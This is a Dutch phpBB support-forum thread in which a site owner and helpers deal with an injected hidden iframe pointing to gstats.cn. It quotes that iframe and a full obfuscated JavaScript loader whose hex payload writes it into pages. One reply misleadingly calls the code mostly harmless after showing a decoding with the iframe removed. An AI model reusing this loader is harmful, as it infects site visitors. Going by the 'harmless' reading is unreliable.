gehacked forum met iframe

[huub80]

• Adres van je forum: http://belgianinlinecenter.be/forum
  Event. modificaties op je forum:calender
  Wanneer ontstond het probleem?enige tijd terug
  phpBB versie: 3.0.4
  
  Heb je onlangs iets veranderd aan je forum? woopra geïnstalleerd (statcounter)
  Wat is het probleem?

Beste,

kunnen jullie mij helpen.
Ik krijg via een gebruik de melding dat we op ons forum met een probleem zitten; nm dat ons forum gehacked is...

er zou dus een code geplaatst zijn in onze php, nm dit:

Code: Selecteer alles

<iframe src=http://gstats.cn style=display:none></iframe>

deze zorgt dus voor problemen met virusscanners, pop-ups, ..


dit is de post in ons forum door de gebruiker, http://www.belgianinlinecenter.be/forum ... 363#p66363
wie kan me helpen..

Ik kreeg deze melding slechts 1 maal...
Momenteel krijg ik hem niet, tenzij ik via een cache pagina van google chrome het forum wil bekijken (daarstraks toch..)


kan ik dit zelf oplossen, of kan ik hiervoor het support team inschakelen?

[Pascal]

Kijk eens in: styles/UWSTIJL/template/index-body.html of je daar die code ziet,

Het is ook belanrijk om uit te vinden hoe ze op je server kwamen (in ieder geval de wachtwoorden veranderen en de pc scannen)

[stimpy68]

Weet hier helaas alles van, mijn website + forum zijn afgelopen donderdag slachtoffer geworden van een IFrame hack.
Ben er ook inmiddels achter hoe:

Op 1 of andere manier is er een trojan op mijn PC terechtgekomen (in dit geval ging het om een bestand wat heette tmp112.exe) en deze werd niet ontdekt door mijn virusscanner, een andere scanner ontdekte 'm wel, deze had een keylogger/sniffer in zich. Ik heb die dag bestanden aangepast op mijn forum via FTP. De trojan heeft de inloggegevens doorgesluist naar een botnet wat vervolgens onder verschillende ip adressen ieder index.php, index.html, default, html en default.php (en nog wat van dit soort bestanden die als eerste worden geopend op een site/forum) voorzien van de IFrame code. De IFrame code stuurt een virus naar de mensen die de website openen,, in mijn geval was het een nieuw virus wat 2 dagen oud was, dit virus haalt op zijn beurt weer verschillende trojans binnen om het botnet uit te breiden.

Het wijzigen van de bestanden was allemaal terug te lezen in de FTP logs bij de webhost. Oplossing was om een restore te doen van alles, dit is door de webhost gedaan. Databases zijn niet aangetast, dus alles werkt weer zodra de restore gedaan is.
Dankzij de hulp van mijn webhost draaide alles weer binnen 24 uur, en als zij geen netwerkproblemen hadden dan was alles binnen 12 uur opgelost.

Dus:
- Eerst achterhalen hoe ze erop gekomen zijn.
- Alle wachtwoorden van de databases en FTP accounts meteen wijzigen
- Virusscan uitvoeren op je PC's (met verschillende scanners!)
- Restore uitvoeren van alle bestanden.

Succes!

[Pascal]

Ik denk dat je eerst kunt scannen voordat je de wachtwoorden wijzigt, anders heeft het nog steeds niet veel nut

Het wordt altijd aanraden om je systeem up to date te houden met de laatste service packs en upgrades, (en tevens ook je virus scanner, firewall) Avast is een goede scanner die bij mij heet meeste meteen detecteerd.

[stimpy68]

Ik gebruikte Sophos Anti virus en deze was up-to-date, deze herkende wel het nieuwe virus namelijk, deze mag ik gebruiken via mijn werk, werkt(e) prima, tot vorige week. Mijn systemen zijn altijd voorzien van de laatst updates e.d.
Mijn lijstje van acties is in willekeurige volgorde, maar inderdaad eerst zorgen dat het probleem opgelost is waardoor ze er in de eerste plaats opgekomen zijn. Zorgen dat je systemen thuis schoon zijn en dan de wachtwoorden aanpassen.

[huub80]

allemaal zeer raar..
Virusscanner (bitdefender) ook altijd up2date en ik heb de laatste versie van phpbb...
Ik laat eerst alle pc's controleren door panda online en de bitdefender.. Tot vandaag nooit melding gekregen van een virus...

IK zal uit voorzorg alvast de logs opvragen bij de host; en straks eens opzoek gaan in welke documenten de iframe kaders staan...

Meer info soon dus...
alvast bedankt voor de hulp..
Wel raar dat er zo weinig over te vinden is; zijn we dan de enigste?!

[stimpy68]

Nee hoor, zoek maar eens op IFrame exploit op Google, kom je genoeg tegen. Het hoeft niet via FTP gegaan te zijn, het kan ook nog via Wordpress/Joomla gegaan zijn, draai je dat ook?

Ik zou wel alles even offline gooien om verdere verspreiding te voorkomen!

[Pascal]

Ik denk niet je de enigste bent, er worden dagelijks wel meer sites aangevallen (of hoe je het ook noemt, (kapot gemaakt) ). Het internet is zo groot wie weet.

En hoe schoon de pc ook is, hoe groot de muur eromheen ook is, er is altijd wel een gat te vinden. (Of er is iets gedownload waar toevallig slechte code inzit).

Het is sowieso aan te raden om je host hiervan op de hoogte praten, mischien hebben zij tips of kunnen ze een onderzoek starten als dit vaker voorkomt

[stimpy68]

Inderdaad je webhost ook inlichten, mijn webhost heeft al het mogelijke gedaan om mij te helpen, waaronder het napluizen van de FTP logs, zo kwam ik er achter dat het via FTP was gegaan en dat ze mijn gegevens hadden onderschept. Ik heb meteen mijn site downgebracht om verdere verspreiding van het virus te voorkomen. De hack is uiterlijk 2 uur actief geweest.

[huub80]

beste,


mijn broer deed een scan van alle bestanden die aangepast waren binnen een tijdsbestek van enkele minuten en kwam uit op een zeer rare javascript code

Code: Selecteer alles

 A91D4F5A63B3="p";A91D4F5A63B3+="ar";A91D4F5A63B3+="seInt";B8A7D="Strin";B8A7D+="g.fromC";B8A7D+="harCod";B8A7D+="e";function F2A5A02CC76D0(E52F6B6D50A){var C02A91=680;C02A91=C02A91-664;A7F10E=eval(A91D4F5A63B3+"(E52F6B6D50A,C02A91)");return(A7F10E);}function E5DE11E49CA73F7(B20DBE58962645){var D111356=751;D111356=D111356-749;var A2693="";for(C24717003=0;C24717003<B20DBE58962645.length;C24717003+=D111356){A2693+=( eval(B8A7D+"(F2A5A02CC76D0(B20DBE58962645.substr(C24717003,D111356)))"));}eval(A2693);}E5DE11E49CA73F7("69662028646F63756D656E742E636F6F6B69652E73656172636828227177773D342229203D3D202D3129207B0A6F6C7A3D646F63756D656E742E676574456C656D656E744279496428276F7361646727293B6966286F6C7A3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6F73616467207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227177773D343B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D")

zijn er mensen die deze code (her)kennen en of weten wat de afkomst kan zijn.


belangrijk dus om in de gaten te houden.
15bestanden zijn er gevonden met deze code, aangemaakt op 23/03/2009 om 2:54
2bestanden met de iframe code konden we terugvinden.



momenteel hebben we de host gevraagd om een restore te doen, in de hoop dat deze hieraan kan / wil voldoen.

[Tom V]

de code is een vervanging van:

Code: Selecteer alles

if (document.cookie.search("qww=4") == -1) 
{ 
    olz=document.getElementById('osadg');
    if(olz==null)
    {
        document.write('');
    }
    document.cookie = "qww=4;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";
} 

En zoals je ziet maakt het een cookie aan, maar veel doet het dus niet ...

[huub80]

heeft u een verklaring waarom het samen met de iframes is aangemaakt?
is het onschadelijk?

momenteel voeren ze een restore uit, hopelijk zijn alle problemen dan van de baan...

[huub80]

heren,

wij zitten met een groot probleem...

de laatste restore van de host leverde niets op, in tegendeel.. zaken blijken te verergeren..

Nu vraagt mij host of er een probleem is als ze een restore doen van lang geleden, November...
Is dit een probleem?

Is er bij de vorige updates van phpbb (volgens mij was de laatste in december) een aanpassing geweest in de database ook?
zullen er hierbij conflicten ontstaan?


Indien iemand ons dringend kan antwoorden, dit probleem blijft aanslepen bij ons..
alvast dank!!!

[Paul]

Als het enkel in de file zit kan je gewoon de bestanden van een clean 3.0.4 uploaden (Excl config.php en install/), en daarna je MODs opnieuw installeren.

[huub80]

Als het enkel in de file zit kan je gewoon de bestanden van een clean 3.0.4 uploaden (Excl config.php en install/), en daarna je MODs opnieuw installeren.

euhm..
sorry, versta het niet...


wat moet gebeuren bij ons is een volledige restore van de mappen en bestanden.
de host heeft enkel nog een backup voor de restore van voor november, voor dat ik de update uitvoerde.

de vraag is, wat kan er misgaan als we de restore doen van de mappen en bestanden; de database laten we ongemoeid...



die code vinden we in deze bestanden:

• cache\index.htm(11)
  download\index.htm(11)
  files\index.htm(11)
  includes\index.htm(11)
  language\index.htm(11)
  phpmyadmin\browse_foreigners.php(282)
  phpmyadmin\calendar.php(30)
  phpmyadmin\error.php(84)
  phpmyadmin\pmd_general.php(133)
  phpmyadmin\pmd_help.php(33)
  phpmyadmin\pmd_pdf.php(90)
  phpmyadmin\querywindow.php(297)
  phpmyadmin\themes.php(46)
  phpmyadmin\translators.html(53)
  __install___\database_update.php(1403)
  phpmyadmin\changelog.php(59)
  ___install___\index.php(651)

[huub80]

melding die ikzelf krijg bij het bekijken van een van deze bestanden:

Code: Selecteer alles

Waarschuwing: het bezoeken van deze site kan uw computer beschadigen.
De website op www.belgianinlinecenter.be bevat elementen van de site divinets.cn, die malware lijkt te hosten. Dat is software die uw computer kan beschadigen of zonder uw medeweten acties kan uitvoeren. Als u een site die malware bevat alleen al bezoekt, kan uw computer worden geïnfecteerd.
Ga voor meer informatie over de problemen met deze elementen naar de Diagnosepagina voor Safe Browsing van Google voor divinets.cn.

[Pascal]

Ik zal even naar de host stappen, want er zijn ook phpmyadmin bestanden geraakt...

[Paul]

Verwijder de complete map van phpmyadmin en de rest die files die genoemd zijn. DAn is het opgelost.

[huub80]

Verwijder de complete map van phpmyadmin en de rest die files die genoemd zijn. DAn is het opgelost.

ik heb de stappen ondernomen die u net opsomt, bij controle van de versie kom ik uit op:

Code: Selecteer alles

Je phpBB-versie is niet up-to-date.
Huidige versie 3.0.3
Laatste versie 3.0.4

Is het de bedoeling om die restore te laten doen door de host
OF
om gewoon een software update te laten uitvoeren?


alvast bedankt voor de hulp!

[huub80]

Verwijder de complete map van phpmyadmin en de rest die files die genoemd zijn. DAn is het opgelost.

ik heb de stappen ondernomen die u net opsomt, bij controle van de versie kom ik uit op:

Code: Selecteer alles

Je phpBB-versie is niet up-to-date.
Huidige versie 3.0.3
Laatste versie 3.0.4

kan ik nu zonder enig probleem een automatische update uitvoeren, of moet ik andere stappen ondernemen?!
bedankt in elk geval, momenteel werkt alles goed en wel!
Hiervoor hebben jullie gezorgd, en niet onze host - da was nm een nachtmerrie...